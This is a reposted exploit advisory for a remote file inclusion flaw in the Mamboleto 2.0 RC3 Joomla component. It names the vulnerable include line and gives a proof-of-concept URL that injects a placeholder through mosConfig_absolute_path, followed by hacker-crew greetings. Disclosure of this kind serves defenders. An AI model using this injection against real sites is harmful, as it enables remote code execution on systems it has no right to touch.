Mamboleto Joomla! component Remote File Include Vulneralbility

15.47 ---
/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulneralbility
[!] Author : Don Takaci (root@dalnetwork.org)
[!] Homepage : http://www.dalnetwork.org
[!] Date : April 27, 2011
[!] Tune In : http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em “legacy mode”.
Muito mais aprimorado com dois bancos a mais (Sicredi e Bancoob) e com um novo módulo de integração com o VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . ‘/administrator/components/com_mamboleto/include/pre.php’);

[ Proof of Concept ]

http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] DALNETWORK TEAM – TULUNGAGUNGCYBER CREW – MainHack Brotherhood – ServerIsDown
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ]

[>] FOR MALINGSIAL

[ some quotes ]

[+] Takaci- says : why so serious ?
[+] RAFLY says : awas ada tukang =))
[+] s3v4 says : Kumpulkan Koin untuk KaKuNg !!!
[+] jepanx says : Oke lah kalau beg… beg… beg… begitu :D
[+] KiLo says : Ojo di maem pleaseeeeee!!!
[+] AR_GA says : aku bukan HOMO <++++ Fitnah nih ga mau ngakuin :p
Diposting oleh Andy Wijaya di 15.47
Label:

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)